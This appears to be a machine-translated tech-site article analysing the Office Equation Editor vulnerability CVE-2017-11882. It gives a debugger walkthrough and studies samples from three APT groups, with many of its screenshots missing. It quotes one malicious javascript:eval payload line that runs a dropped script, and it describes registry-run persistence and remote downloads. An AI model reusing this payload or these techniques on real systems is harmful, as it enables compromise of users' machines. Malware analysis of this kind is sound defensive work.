Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about CVE-2017-11882 and what the sample analysis is like. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

CVE-2017-11882 and 0x01 vulnerability description using sample Analysis

Cause: Windows's formula editor EQNEDT32.EXE reads OLE data containing MathType, and does not check the length of the formula font name when copying the formula font name, so that an attacker can hijack the program flow by deliberately constructing the data content to overwrite the function return address on the stack.

Affected version: Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, Microsoft Office 2016

POC: https://github.com/Ridter/CVE-2017-11882

0x02 vulnerability analysis

The author reproduces and analyzes the environment: Windows 7 Service Pack 1, Microsoft Office 2010, x32dbg, IDA 7.0,

EQUATION.exe exists:

Set the registry key HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Image File Execution Options\ EQNEDT32.EXE:

The Debugger key value is the x32dbg path.

Generate POC:

Open the document and set the break at the WinExec () function:

After successfully disconnecting, check the returned address in the stack:

Continue to look up the stack and find the function that calls WinExec ():

Analyze sub_4115A7 functions through IDA:

Follow up sub_41160F View:

If the length is not checked, use the strcpy () function directly, which should be the location where the vulnerability was triggered. Further determine the specific location:

Set it off at 0x411658 and run it again. After the second successful disconnection, check that the ESI register points to the memory content:

At this point, the ECX register value is 0xC, which means copying 48 bytes to the EDI register points to memory, while the actual size of the var_28 is only 36 bytes:

Reach the end of the function:

After the leave instruction is executed, the value at the top of the stack 0x18F1D0 is 0x430C12, that is, WinExec () is called. The passed parameter is the cmd instruction that 0x18F350 points to in memory:

Successfully eject the calculator:

The following is a brief analysis of the POC used. The meaning of each variable can be known by the name, RTF document format is not the focus of this article, such as readers do not understand the RTF document format before, it is recommended to read the end of the reference link at the end of the article on the RTF document format of the article before looking at the POC source code.

First of all, determine whether the length of the command is less than 43, and the number 43 is because:

The selected part of the image above is the insertion command, and the specific offset is given by the COMMAND_OFFSET (0x949*2) variable in POC.

After the command is inserted into the construction data, the function returns the spliced OLE. Let's embed OLE into the RTF document:

Analysis of a sample of 0x03 APT-C-09 tissue

MD5:0D38ADC0B048BAB3BD91861D42CD39DF

Set it at 0x411658, and when it is disconnected for the second time, the values of each register are as follows:

Continue to execute the leave instruction at the end of the function:

The value 0x430**7 at the 0x18F230 address is the returned address of the overridden function:

The instruction at this address is ret, which is somewhat unexpected. Continue to execute down to the 0x18F3B0, which is the value at the 0x18F234 address:

This is the instruction that the constructor intends to execute. After a series of operations in the blue box, the EBX points to the real Shellcode:

All of the above can be viewed in OLE (path\ xl\ embeddings):

After copying the data from OLE0x1000-0x1520 to a bin file, view it through IDA. The sub_247 functions are as follows:

The second parameter accepted by this function is the EBX point address mentioned above, which is 0x1040 in OLE, and the content in 0x1040+0x558 is as follows:

Therefore, the first function of this function is to correct the PE file header. The second function flow is as follows:

Write the PE file data after 0x1040+0x558 to% APPDATA%\ MSBuild.exe. The third function flow is as follows:

Write% APPDATA%\ MSBuild.exe to the registry run key value lollipop.

Analysis of a sample of 0x04 rattlesnake (SideWinder) tissue

Drag the document into WinHex to view:

You can see that the document is essentially an RTF format document.

The analysis with rtfobj.py is as follows:

As will be mentioned later in Package, let's take a look at the CVE-2017-11882 utilization section.

It was also the second time that it was cut off:

The subsequent execution process is similar to the previous one:

After a series of operations in the green box, the GlobalLock () function is called, passing the following parameters:

Next, jump to the GlobalLock () function to return the memory area:

After two call calls:

Fix the string in memory:

Next, address the kernel32.dll:

The functions it calls are as follows:

After two call calls:

Its function is to return the address of a function call, this time LoadLibrayW ():

Next, return the address of the GetProcAddress () call:

Continue the call call:

The subsequent process is shown in the figure:

Below, decrypt the string and overwrite the original CommandLine content:

The results are as follows:

Finally, the actual implementation part:

_ javascript:eval ("sa=ActiveXObject;ab=new sa (\" Scripting.FileSystemObject\ "); eval (ab.OpenTextFile (ab.GetSpecialFolder (2) +\"\ 1.a\ ", 1) .ReadAll (); windowclose ()")

Then call RunHTMLApplication ():

1.An is the Package in the RTF document mentioned earlier, which is essentially a JS file:

Finally, the implementation result is roughly shown in the following figure:

Analysis of a sample of 0x05 Bitter tissue

Download a document in RTF format by remote template injection:

Drag into WinHex to confirm that the format is in RTF document format:

After you add the file extension, open the document. Also at the second break at 0x411658:

The jump is followed by a series of calculations in the green box, followed by the jump:

Fldpi loads the value of π into the FPU stack:

After execution, fpu_instruction_pointer points to the fldpi instruction, and the subsequent fnstenv instruction saves the FpuSaveState structure to esp-0xC:

In this way, the value of the EBP register after pop ebp is the fpu_instruction_pointer--fldpi instruction location:

The starting position of the data to be decrypted is calculated by EBP, and the data length (0x315) is stored in EDX:

Then execute the decrypted instruction:

After the jump, execute the corresponding instruction, and then call call:

The sub_562B2F function is to obtain the specified system function call address, this time kernel32.VirtualAlloc ():

Then call VirtualAlloc () to request memory space:

Write data to the requested memory space:

Call sub_562B2F to get the address of the kernel32.Wow64DisableWow64FsRedirection () call:

LoadLibrary (shell32):

Pass the parameter to sub_562B2F to get the address of the shell32.ShellExcute () call:

LoadLibrary (urlmon):

Get the urlmon.URLDownloadToFile () call address:

Call URLDownloadToFile (), which passes parameters as shown in the figure:

Read the file:

Because the file was not obtained, the calculated EBX value is incorrect:

The above is the CVE-2017-11882 shared by the editor and what the sample analysis is like. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.